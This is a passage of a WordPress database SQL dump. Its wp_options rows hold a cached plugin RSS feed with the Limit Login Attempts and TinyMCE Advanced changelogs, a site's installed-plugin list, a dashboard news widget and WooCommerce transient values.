href="mailto:&#101;&#114;&#105;&#x6b;&#x40;&#101;&#114;&#105;&#x6b;&#x73;&#x68;&#111;&#115;t&#x69;&#x6e;&#103;&#046;c&#x6f;&#x6d;" rel="nofollow">&#101;&#114;&#105;&#x6b;&#x40;&#101;&#114;&#105;&#x6b;&#x73;&#x68;&#111;&#115;t&#x69;&#x6e;&#103;&#046;c&#x6f;&#x6d;</a>)</li>\n<li>Better error handling if option variables are damaged</li>\n<li>Added Traditional Chinese translation, thanks to Denny Huang <a href="mailto:&#x62;&#105;&#x67;&#101;&#x78;&#112;&#x6c;&#111;&#114;&#x61;&#116;&#x69;&#111;&#x6e;&#115;&#064;&#x62;&#105;&#x67;&#101;&#x78;&#112;&#108;&#x6f;&#114;&#x61;&#116;&#x69;&#111;n&#x73;&#046;&#x63;&#111;&#x6d;&#046;t&#x77;" rel="nofollow">&#x62;&#105;&#x67;&#101;&#x78;&#112;&#x6c;&#111;&#114;&#x61;&#116;&#x69;&#111;&#x6e;&#115;&#064;&#x62;&#105;&#x67;&#101;&#x78;&#112;&#108;&#x6f;&#114;&#x61;&#116;&#x69;&#111;n&#x73;&#046;&#x63;&#111;&#x6d;&#046;t&#x77;</a></li>\n</ul>\n<h4>1.5</h4>\n<ul>\n<li>Tested against WordPress 3.0</li>\n<li>Handle 3.0 login page failure &#8220;shake&#8221;</li>\n<li>Basic multisite support (parts thanks to <a href="mailto:&#101;&#114;&#105;&#x6b;&#x40;&#101;&#114;&#105;&#x6b;&#x73;&#x68;&#111;&#115;t&#x69;&#x6e;&#103;&#046;c&#x6f;&#x6d;" rel="nofollow">&#101;&#114;&#105;&#x6b;&#x40;&#101;&#114;&#105;&#x6b;&#x73;&#x68;&#111;&#115;t&#x69;&#x6e;&#103;&#046;c&#x6f;&#x6d;</a>)</li>\n<li>Added Dutch translation, thanks to Bjorn Wijers <a href="mailto:b&#117;&#x72;&#111;&#x62;&#x6a;&#111;&#x72;n&#064;&#x62;&#117;&#x72;&#x6f;&#098;&#x6a;&#111;&#114;&#x6e;&#046;&#x6e;l" rel="nofollow">b&#117;&#x72;&#111;&#x62;&#x6a;&#111;&#x72;n&#064;&#x62;&#117;&#x72;&#x6f;&#098;&#x6a;&#111;&#114;&#x6e;&#046;&#x6e;l</a></li>\n<li><a href="mailto:&#098;&#097;&#x6c;&#x69;&#110;&#116;&#x40;v&#101;&#x72;&#x65;&#115;&#107;&#x75;&#x74;&#105;&#046;&#x69;n&#102;&#x6f;" rel="nofollow">&#098;&#097;&#x6c;&#x69;&#110;&#116;&#x40;v&#101;&#x72;&#x65;&#115;&#107;&#x75;&#x74;&#105;&#046;&#x69;n&#102;&#x6f;</a></li>\n<li>Added French translation, thanks to oVa <a href="mailto:&#111;&#118;&#x61;&#x31;&#x33;l&#097;&#115;&#x74;&#x61;&#x72;&#064;&#103;&#109;&#097;&#x69;&#x6c;&#x2e;&#099;&#111;&#109;" rel="nofollow">&#111;&#118;&#x61;&#x31;&#x33;l&#097;&#115;&#x74;&#x61;&#x72;&#064;&#103;&#109;&#097;&#x69;&#x6c;&#x2e;&#099;&#111;&#109;</a></li>\n</ul>\n<h4>1.4.1</h4>\n<ul>\n<li>Added Turkish translation, thanks to Yazan Canarkadas</li>\n</ul>\n<h4>1.4</h4>\n<ul>\n<li>Protect admin page update using wp_nonce</li>\n<li>Added Czech translation, thanks to Jakub Jedelsky</li>\n</ul>\n<h4>1.3.2</h4>\n<ul>\n<li>Added Bulgarian translation, thanks to Hristo Chakarov</li>\n<li></li>\n<li>Added Spanish translation, thanks to Marcelo Pedra</li>\n<li>Added Persian translation, thanks to Mostafa Soufi</li>\n<li>Added Russian translation, thanks to Jack Leonid (http://studio-xl.com)</li>\n</ul>\n<h4>1.3.1</h4>\n<ul>\n<li>Added Catalan translation, thanks to Robert Buj</li>\n<li>Added Romanian translation, thanks to Robert Tudor</li>\n</ul>\n<h4>1.3</h4>\n<ul>\n<li>Support for getting the correct IP for clients while server is behind reverse proxy, thanks to Michael Skerwiderski</li>\n<li>Added German translation, thanks to Michael Skerwiderski</li>\n</ul>\n<h4>1.2</h4>\n<ul>\n<li>No longer replaces pluggable function when cookie handling active. Re-implemented using available actions and filters</li>\n<li>Filter error messages during login to avoid information leak regarding available usernames</li>\n<li>Do not show retries or lockout messages except for login (registration, lost password pages). No change in actual enforcement</li>\n<li>Slightly more aggressive in trimming old retries data</li>\n</ul>\n<h4>1.1</h4>\n<ul>\n<li>Added translation support</li>\n<li>Added Swedish translation</li>\n<li>During lockout, filter out all other login errors</li>\n<li>Minor cleanups</li>\n</ul>\n<h4>1.0</h4>\n<ul>\n<li>Initial version</li>\n</ul>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:56:"https://wordpress.org/plugins/limit-login-attempts/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:9;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n		\n		\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:16:"TinyMCE Advanced";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:47:"https://wordpress.org/plugins/tinymce-advanced/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:55:"https://wordpress.org/plugins/tinymce-advanced/#respond";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 22 Jun 2007 06:02:53 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:50:"https://wordpress.org/plugins-wp/tinymce-advanced/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:58:"Extends and enhances TinyMCE, the WordPress Visual Editor.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:10:"Andrew Ozz";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:10701:"<p><!--section=description--></p>\n<p>This plugin will let you add, remove and arrange the buttons that are shown on the Visual Editor toolbar. You can configure up to four rows of buttons including Font Sizes, Font Family, text and background colors, tables, etc. It will also let you enable the editor menu, see the <a href="screenshots" rel="nofollow">screenshots</a>.</p>\n<p>It includes 15 plugins for <a href="http://tinymce.com/" rel="nofollow">TinyMCE</a> that are automatically enabled or disabled depending on the buttons you have chosen. In addition this plugin adds some commonly used options as keeping the paragraph tags in the Text editor and importing the CSS classes from the theme&#8217;s editor-style.css.</p>\n<h4>Some of the features added by this plugin</h4>\n<ul>\n<li>Support for creating and editing tables.</li>\n<li>More options when inserting lists.</li>\n<li>Search and Replace in the editor.</li>\n<li>Ability to set Font Family and Font Sizes.</li>\n<li>And many others.</li>\n</ul>\n<p>With this plugin you can also enable the TinyMCE menu above the toolbars. This will make the editor even more powerful and convenient.</p>\n<p><!--section=installation--></p>\n<p>Best is to install directly from WordPress. If manual installation is required, please make sure that the plugin files are in a folder named &#8220;tinymce-advanced&#8221; (not two nested folders) in the WordPress plugins folder, usually &#8220;wp-content/plugins&#8221;.</p>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<p>Best is to install directly from WordPress. If manual installation is required, please make sure that the plugin files are in a folder named &#8220;tinymce-advanced&#8221; (not two nested folders) in the WordPress plugins folder, usually &#8220;wp-content/plugins&#8221;.</p>\n</dd>\n<dt>No styles are imported in the Formats sub-menu.</dt>\n<dd>\n<p>These styles are imported from your current theme editor-style.css file. However some themes do not have this functionality. For these themes TinyMCE Advanced has the option to let you add a customized editor-style.css and import it into the editor.</p>\n</dd>\n<dt>I have just installed this plugin, but it does not do anything.</dt>\n<dd>\n<p>Change some buttons on one of the toolbars, save your changes, clear your browser cache, and try again. If that does not work try reloding the Edit page several times while holding down Shift or Ctrl. There may also be a network cache somewhere between you and your host. You may need to wait for a few hours until this cache expires.</p>\n</dd>\n<dt>When I add &#8220;Smilies&#8221;, they do not show in the editor.</dt>\n<dd>\n<p>The &#8220;Emoticons&#8221; button in TinyMCE adds the codes for the smilies. The actual images are added by WordPress when viewing the Post. Make sure the checkbox &#8220;Convert emoticons to graphics on display&#8221; in &#8220;Options &#8211; Writing&#8221; is checked.</p>\n</dd>\n<dt>The plugin does not add any buttons.</dt>\n<dd>\n<p>Make sure the &#8220;Disable the visual editor when writing&#8221; checkbox under &#8220;Users &#8211; Your Profile&#8221; is <strong>not</strong> checked.</p>\n</dd>\n<dt>I still see the &#8220;old&#8221; buttons in the editor</dt>\n<dd>\n<p>Click the &#8220;Restore Default Settings&#8221; button on the plugin settings page and then set the buttons again and save.</p>\n</dd>\n<dt>Other questions? More screenshots?</dt>\n<dd>\n<p>Please post on the support forum or visit the homepage for <a href="http://www.laptoptips.ca/projects/tinymce-advanced/" rel="nofollow">TinyMCE Advanced</a>.</p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>4.6.3</h4>\n<ul>\n<li>Updated for WordPress 4.8 and TinyMCE 4.6.3.</li>\n</ul>\n<h4>4.5.6</h4>\n<ul>\n<li>Updated for WordPress 4.7.4 and TinyMCE 4.5.6.</li>\n<li>Fixed PHP notice after importing settings.</li>\n</ul>\n<h4>4.4.3</h4>\n<ul>\n<li>Updated for WordPress 4.7 and TinyMCE 4.4.3.</li>\n<li>Fixed missing &#8220;Source code&#8221; button bug.</li>\n</ul>\n<h4>4.4.1</h4>\n<ul>\n<li>Updated for WordPress 4.6 and TinyMCE 4.4.1.</li>\n<li>Fixed multisite saving bug.</li>\n<li>Added new button in the Text editor to add or reset the line breaks. Adds line breaks only between tags. Works only when it detects that line breaks are missing so it doesn&#8217;t reformat posts with removed paragraphs.</li>\n</ul>\n<h4>4.3.10.1</h4>\n<ul>\n<li>Fixed adding paragraph tags when loading posts that were saved before turning autop off.</li>\n<li>Disabled the (new) inline toolbar for tables as it was overlapping the table in some cases.</li>\n</ul>\n<h4>4.3.10</h4>\n<ul>\n<li>Updated for WordPress 4.5.1 and TinyMCE 4.3.10.</li>\n<li>Fixed support for adding editor-style.css to themes that don&#8217;t have it.</li>\n</ul>\n<h4>4.3.8</h4>\n<ul>\n<li>Updated for WordPress 4.5 and TinyMCE 4.3.8.</li>\n<li>Separated standard options and admin options.</li>\n<li>Added settings that can disable the plugin for the main editor, other editors in wp-admin or editors on the front-end.</li>\n<li>Korean translation by Josh Kim and Greek translation by Stathis Mellios.</li>\n</ul>\n<h4>4.2.8</h4>\n<ul>\n<li>Updated for WordPress 4.4 and TinyMCE 4.2.8.</li>\n<li>Japanese translation by Manabu Miwa.</li>\n</ul>\n<h4>4.2.5</h4>\n<ul>\n<li>Updated for WordPress 4.3.1 and TinyMCE 4.2.5.</li>\n<li>Fixed text domain and plugin headers.</li>\n</ul>\n<h4>4.2.3.1</h4>\n<ul>\n<li>Fix error with removing the &#8216;textpattern&#8217; plugin.</li>\n</ul>\n<h4>4.2.3</h4>\n<ul>\n<li>Updated for WordPress 4.3 and TinyMCE 4.2.3.</li>\n<li>Removed the &#8216;textpattern&#8217; plugin as WordPress 4.3 includes similar functionality by default.</li>\n<li>French translation by Nicolas Schneider.</li>\n</ul>\n<h4>4.1.9</h4>\n<ul>\n<li>Updated for WordPress 4.2 and TinyMCE 4.1.9.</li>\n<li>Fixed bugs with showing oEmbed previews when pasting an URL.</li>\n<li>Fixed bugs with getting the content from TinyMCE with line breaks.</li>\n</ul>\n<h4>4.1.7</h4>\n<ul>\n<li>Updated for WordPress 4.1 and TinyMCE 4.1.7.</li>\n<li>Fixed bug where consecutive caption shortcodes may be split with an empty paragraph tag.</li>\n</ul>\n<h4>4.1.1</h4>\n<ul>\n<li>Fix bug with image captions when wpautop is disabled.</li>\n<li>Add translation support to the settings page. Button names/descriptions are translated from JS using the existing WordPress translation, so this part of the settings page will be translated by default. The other text still needs separate translation.</li>\n</ul>\n<h4>4.1</h4>\n<ul>\n<li>Updated for WordPress 4.0 and TinyMCE 4.1.</li>\n<li>Add the &#8216;textpattern&#8217; plugin that supports some of the markdown syntax while typing, <a href="http://www.tinymce.com/wiki.php/Configuration:textpattern_patterns" rel="nofollow">(more info)</a>.</li>\n<li>Add the updated &#8216;table&#8217; plugin that supports background and border color.</li>\n</ul>\n<h4>4.0.2</h4>\n<ul>\n<li>Fix showing of the second, third and forth button rows when the Toolbar Toggle button is not used.</li>\n<li>Fix adding the &#8221;directionality&#8221; plugin when RTL or LTR button is selected.</li>\n<li>Show the &#8221;Advanced Options&#8221; to super admins on multisite installs.</li>\n<li>Add the &#8221;link&#8221; plugin including link rel setting. Replaces the Insert/Edit Link dialog when enabled.</li>\n<li>Include updated &#8221;table&#8221; plugin that has support for vertical align for cells.</li>\n</ul>\n<h4>4.0.1</h4>\n<p>Fix warnings on pages other than Edit Post. Update the description.</p>\n<h4>4.0</h4>\n<p>Updated for WordPress 3.9 and TinyMCE 4.0. Refreshed the settings screen. Added support for exporting and importing of the settings.</p>\n<h4>3.5.9.1</h4>\n<p>Updated for WordPress 3.8, fixed auto-embedding of single line URLs when not removing paragraph tags.</p>\n<h4>3.5.9</h4>\n<p>Updated for WordPress 3.7 and TinyMCE 3.5.9.</p>\n<h4>3.5.8</h4>\n<p>Updated for WordPress 3.5 and TinyMCE 3.5.8.</p>\n<h4>3.4.9</h4>\n<p>Updated for WordPress 3.4 and TinyMCE 3.4.9.</p>\n<h4>3.4.5.1</h4>\n<p>Fixed a bug preventing TinyMCE from importing CSS classes from editor-style.css.</p>\n<h4>3.4.5</h4>\n<p>Updated for WordPress 3.3 or later and TinyMCE 3.4.5.</p>\n<h4>3.4.2.1</h4>\n<p>Fix the removal of the <em>media</em> plugin so it does not require re-saving the settings.</p>\n<h4>3.4.2</h4>\n<p>Compatibility with WordPress 3.2 and TinyMCE 3.4.2, removed the options for support for iframe and HTML 5.0 elements as they are supported by default in WordPress 3.2, removed the <em>media</em> plugin as it is included by default.</p>\n<h4>3.3.9.1</h4>\n<p>Added advanced options: stop removing iframes, stop removing HTML 5.0 elements, moved the support for custom editor styles to editor-style.css in the current theme.</p>\n<p>Attention: if you have a customized tadv-mce.css file and your theme doesn&#8217;t have editor-style.css, please download tadv-mce.css, rename it to editor-style.css and upload it to your current theme directory. Alternatively you can add there the editor-style.css from the Twenty Ten theme. If your theme has editor-style.css you can add any custom styles there.</p>\n<h4>3.3.9</h4>\n<p>Compatibility with WordPress 3.1 and TinyMCE 3.3.9, improved P and BR tags option.</p>\n<h4>3.2.7</h4>\n<p>Compatibility with WordPress 2.9 and TinyMCE 3.2.7, several minor bug fixes.</p>\n<h4>3.2.4</h4>\n<p>Compatibility with WordPress 2.8 and TinyMCE 3.2.4, minor bug fixes.</p>\n<h4>3.2</h4>\n<p>Compatibility with WordPress 2.7 and TinyMCE 3.2, minor bug fixes.</p>\n<h4>3.1</h4>\n<p>Compatibility with WordPress 2.6 and TinyMCE 3.1, keeps empty paragraphs when disabling the removal of P and BR tags, the buttons for MCImageManager and MCFileManager can be arranged (if installed).</p>\n<h4>3.0.1</h4>\n<p>Compatibility with WordPress 2.5.1 and TinyMCE 3.0.7, added option to disable the removal of P and BR tags when saving and in the HTML editor (autop), added two more buttons to the HTML editor: autop and undo, fixed the removal of non-default TinyMCE buttons.</p>\n<h4>3.0</h4>\n<p>Support for WordPress 2.5 and TinyMCE 3.0.</p>\n<h4>2.2</h4>\n<p>Deactivate/Uninstall option page, font size drop-down menu and other small changes.</p>\n<h4>2.1</h4>\n<p>Improved language selection, improved compatibility with WordPress 2.3 and TinyMCE 2.1.1.1, option to override some of the imported css classes and other small improvements and bugfixes.</p>\n<h4>2.0</h4>\n<p>Includes an admin page for arranging the TinyMCE toolbar buttons, easy installation, a lot of bugfixes, customized &#8220;Smilies&#8221; plugin that uses the built-in WordPress smilies, etc. The admin page uses jQuery and jQuery UI that lets you &#8220;drag and drop&#8221; the TinyMCE buttons to arrange your own toolbars and enables/disables the corresponding plugins depending on the used buttons.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:52:"https://wordpress.org/plugins/tinymce-advanced/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:4:"href";s:50:"https://wordpress.org/plugins/browse/popular/feed/";s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:44:"http://purl.org/rss/1.0/modules/syndication/";a:2:{s:12:"updatePeriod";a:1:{i:0;a:5:{s:4:"data";s:6:"hourly";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:15:"updateFrequency";a:1:{i:0;a:5:{s:4:"data";s:1:"1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:9:{s:6:"server";s:5:"nginx";s:4:"date";s:29:"Tue, 22 Aug 2017 14:04:17 GMT";s:12:"content-type";s:34:"application/rss+xml; charset=UTF-8";s:25:"strict-transport-security";s:11:"max-age=360";s:6:"x-olaf";s:3:"⛄";s:13:"last-modified";s:29:"Tue, 22 Aug 2017 13:50:31 GMT";s:4:"link";s:66:"<https://wordpress.org/plugins/wp-json/>; rel="https://api.w.org/"";s:15:"x-frame-options";s:10:"SAMEORIGIN";s:4:"x-nc";s:11:"HIT lax 250";}}s:5:"build";s:14:"20130911040210";}', 'no'); 
INSERT INTO `wp_options` VALUES (693211, '_transient_timeout_feed_mod_b9388c83948825c1edaef0d856b7b109', '1503453857', 'no'); 
INSERT INTO `wp_options` VALUES (693212, '_transient_feed_mod_b9388c83948825c1edaef0d856b7b109', '1503410657', 'no'); 
INSERT INTO `wp_options` VALUES (693213, '_transient_timeout_plugin_slugs', '1503497057', 'no'); 
INSERT INTO `wp_options` VALUES (693214, '_transient_plugin_slugs', 'a:63:{i:0;s:51:"all-in-one-wp-migration/all-in-one-wp-migration.php";i:1;s:91:"all-in-one-wp-migration-unlimited-extension/all-in-one-wp-migration-unlimited-extension.php";i:2;s:61:"all-404-redirect-to-homepage/all-404-redirect-to-homepage.php";i:3;s:21:"articles/articles.php";i:4;s:37:"async-javascript/async-javascript.php";i:5;s:25:"bwp-minify/bwp-minify.php";i:6;s:27:"check-email/check-email.php";i:7;s:17:"wpclef/wpclef.php";i:8;s:27:"comet-cache/comet-cache.php";i:9;s:36:"contact-form-7/wp-contact-form-7.php";i:10;s:38:"sidecar-decision-tree/DecisionTree.php";i:11;s:37:"disable-comments/disable-comments.php";i:12;s:59:"disable-woocommerce-reviews/disable-woocommerce-reviews.php";i:13;s:88:"disclaimer-and-notification-manager-for-authors/disclaimer-manager-multi-author-blog.php";i:14;s:33:"displayProduct/displayProduct.php";i:15;s:25:"duplicator/duplicator.php";i:16;s:39:"easy-google-fonts/easy-google-fonts.php";i:17;s:39:"https-redirection/https-redirection.php";i:18;s:43:"pc-google-analytics/pc-google-analytics.php";i:19;s:48:"wp-live-chat-software-for-wordpress/livechat.php";i:20;s:31:"wp_migration-master/migrate.php";i:21;s:53:"nextend-facebook-connect/nextend-facebook-connect.php";i:22;s:49:"nextend-google-connect/nextend-google-connect.php";i:23;s:27:"ninja-forms/ninja-forms.php";i:24;s:19:"optimus/optimus.php";i:25;s:27:"p3-profiler/p3-profiler.php";i:26;s:71:"password-strength-for-woocommerce/password-strength-for-woocommerce.php";i:27;s:43:"product-enquiry-pro/product_enquiry_pro.php";i:28;s:47:"regenerate-thumbnails/regenerate-thumbnails.php";i:29;s:67:"remove-query-strings-from-static-resources/remove-query-strings.php";i:30;s:57:"reveal-ids-for-wp-admin-25/reveal-ids-for-wp-admin-25.php";i:31;s:17:"schema/schema.php";i:32;s:45:"search-and-replace/inspyde-search-replace.php";i:33;s:37:"show-hide-author/show_hide_author.php";i:34;s:20:"smtp-mailer/main.php";i:35;s:37:"social-media-widget/social-widget.php";i:36;s:41:"speed-booster-pack/speed-booster-pack.php";i:37;s:27:"table-maker/table-maker.php";i:38;s:58:"ultimate-social-media-plus/ultimate_social_media_icons.php";i:39;s:27:"updraftplus/updraftplus.php";i:40;s:55:"url-builder-for-analytics/url-builder-for-analytics.php";i:41;s:47:"user-specific-content/User-Specific-Content.php";i:42;s:33:"w3-total-cache/w3-total-cache.php";i:43;s:27:"woocommerce/woocommerce.php";i:44;s:59:"woocommerce-category-banner/woocommerce-category-banner.php";i:45;s:47:"woocommerce-csvimport/woocommerce-csvimport.php";i:46;s:73:"woocommerce-remove-product-sorting/woocommerce-remove-product-sorting.php";i:47;s:27:"woosidebars/woosidebars.php";i:48;s:33:"wordpress-move/wordpress-move.php";i:49;s:29:"wp-mail-smtp/wp_mail_smtp.php";i:50;s:29:"wp-site-migrate/blogvault.php";i:51;s:35:"wp-fastest-cache/wpFastestCache.php";i:52;s:50:"wp-fastest-cache-premium/wpFastestCachePremium.php";i:53;s:43:"wp-instagram-widget/wp-instagram-widget.php";i:54;s:45:"wp-live-chat-support/wp-live-chat-support.php";i:55;s:47:"wp-simple-mail-sender/wp-simple-mail-sender.php";i:56;s:31:"wp-statistics/wp-statistics.php";i:57;s:27:"wp-super-cache/wp-cache.php";i:58;s:33:"wp-term-images/wp-term-images.php";i:59;s:37:"yith-woocommerce-ajax-search/init.php";i:60;s:45:"yith-woocommerce-tab-manager-premium/init.php";i:61;s:34:"yith-woocommerce-wishlist/init.php";i:62;s:40:"wordpress-seo-premium/wp-seo-premium.php";}', 'no'); 
INSERT INTO `wp_options` VALUES (693215, '_transient_timeout_dash_88ae138922fe95674369b1cb3d215a2b', '1503453857', 'no'); 
INSERT INTO `wp_options` VALUES (693216, '_transient_dash_88ae138922fe95674369b1cb3d215a2b', '<div class="rss-widget"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2017/08/wordpress-4-8-1-maintenance-release/\'>WordPress 4.8.1 Maintenance Release</a> <span class="rss-date">August 2, 2017</span><div class="rssSummary">After over 13 million downloads of WordPress 4.8, we are pleased to announce the immediate availability of WordPress 4.8.1, a maintenance release. This release contains 29 maintenance fixes and enhancements, chief among them are fixes to the rich Text widget and the introduction of the Custom HTML widget. For a full list of changes, consult the release [&hellip;]</div></li></ul></div><div class="rss-widget"><ul><li><a class=\'rsswidget\' href=\'https://wptavern.com/morten-rand-hendriksen-on-what-gutenberg-means-for-the-future-of-wordpress\'>WPTavern: Morten Rand-Hendriksen on What Gutenberg Means For the Future of WordPress</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/facebook-isnt-budging-on-reacts-bsd-patents-license\'>WPTavern: Facebook Isn’t Budging on React’s BSD + Patents License</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/wordpress-org-to-add-new-page-educating-users-on-benefits-of-upgrading-php\'>WPTavern: WordPress.org to Add New Page Educating Users on Benefits of Upgrading PHP</a></li></ul></div><div class="rss-widget"><ul><li class="dashboard-news-plugin"><span>Popular Plugin:</span> Limit Login Attempts&nbsp;<a href="plugin-install.php?tab=plugin-information&amp;plugin=limit-login-attempts&amp;_wpnonce=9d9196d83f&amp;TB_iframe=true&amp;width=600&amp;height=800" class="thickbox open-plugin-details-modal" aria-label="Install Limit Login Attempts">(Install)</a></li></ul></div>', 'no'); 
INSERT INTO `wp_options` VALUES (693217, '_transient_timeout_wc_products_will_display_527_1503410627', '1506002687', 'no'); 
INSERT INTO `wp_options` VALUES (693218, '_transient_wc_products_will_display_527_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693219, '_transient_timeout_wc_term_counts', '1506002687', 'no'); 
INSERT INTO `wp_options` VALUES (693220, '_transient_wc_term_counts', 'a:102:{i:39;s:1:"2";i:99;s:1:"5";i:100;s:1:"3";i:101;s:1:"7";i:175;s:1:"4";i:176;s:1:"5";i:177;s:2:"10";i:178;s:1:"1";i:29;s:1:"4";i:86;s:2:"15";i:79;s:1:"6";i:35;s:2:"23";i:518;s:1:"1";i:37;s:1:"4";i:31;s:1:"1";i:11;s:2:"13";i:262;s:1:"6";i:340;s:1:"5";i:156;s:1:"2";i:161;s:1:"2";i:174;s:1:"1";i:511;s:1:"1";i:128;s:1:"4";i:127;s:2:"21";i:179;s:1:"1";i:155;s:1:"1";i:95;s:2:"24";i:159;s:1:"1";i:227;s:1:"1";i:152;s:1:"3";i:142;s:1:"3";i:93;s:2:"61";i:228;s:1:"1";i:517;s:1:"2";i:516;s:1:"3";i:341;s:1:"5";i:160;s:1:"2";i:520;s:1:"1";i:96;s:1:"8";i:97;s:1:"7";i:98;s:1:"8";i:46;s:2:"23";i:45;s:1:"8";i:34;s:2:"33";i:129;s:1:"8";i:230;s:1:"2";i:20;s:1:"3";i:521;s:1:"6";i:261;s:2:"10";i:524;s:1:"3";i:149;s:3:"140";i:9;s:3:"111";i:165;s:1:"1";i:38;s:1:"4";i:522;s:1:"1";i:523;s:1:"3";i:138;s:1:"3";i:8;s:2:"26";i:180;s:1:"2";i:181;s:1:"1";i:12;s:1:"5";i:130;s:1:"4";i:131;s:1:"1";i:36;s:1:"5";i:231;s:1:"2";i:171;s:1:"2";i:143;s:1:"0";i:260;s:1:"3";i:229;s:1:"3";i:30;s:1:"1";i:527;s:1:"6";i:528;s:1:"4";i:325;s:1:"4";i:16;s:2:"10";i:525;s:1:"4";i:526;s:1:"7";i:21;s:2:"11";i:28;s:1:"2";i:145;s:1:"4";i:144;s:1:"1";i:343;s:2:"10";i:339;s:2:"20";i:515;s:1:"4";i:529;s:1:"2";i:94;s:2:"10";i:10;s:2:"28";i:150;s:1:"6";i:519;s:1:"1";i:151;s:2:"19";i:137;s:1:"6";i:27;s:1:"4";i:13;s:1:"4";i:232;s:1:"6";i:115;s:1:"7";i:116;s:1:"2";i:40;s:1:"9";i:122;s:1:"2";i:123;s:1:"3";i:124;s:1:"2";i:170;s:1:"8";i:169;s:1:"8";i:168;s:2:"16";}', 'no'); 
INSERT INTO `wp_options` VALUES (693224, '_transient_timeout_wc_products_will_display_523_1503410627', '1506002903', 'no'); 
INSERT INTO `wp_options` VALUES (693225, '_transient_wc_products_will_display_523_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693230, '_transient_timeout_a4dd22a17ee72f463514ccabc94dada0', '1503411460', 'no'); 
INSERT INTO `wp_options` VALUES (693231, '_transient_a4dd22a17ee72f463514ccabc94dada0', '404', 'no'); 
INSERT INTO `wp_options` VALUES (693232, '_transient_timeout_wc_products_will_display_8_1503410627', '1506006309', 'no'); 
INSERT INTO `wp_options` VALUES (693233, '_transient_wc_products_will_display_8_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693234, '_transient_timeout_wc_products_will_display_9_1503410627', '1506008793', 'no'); 
INSERT INTO `wp_options` VALUES (693235, '_transient_wc_products_will_display_9_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693236, '_transient_timeout_wc_products_will_display_35_1503410627', '1506005066', 'no'); 
INSERT INTO `wp_options` VALUES (693237, '_transient_wc_products_will_display_35_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693238, '_transient_timeout_wc_products_will_display_516_1503410627', '1506003296', 'no'); 
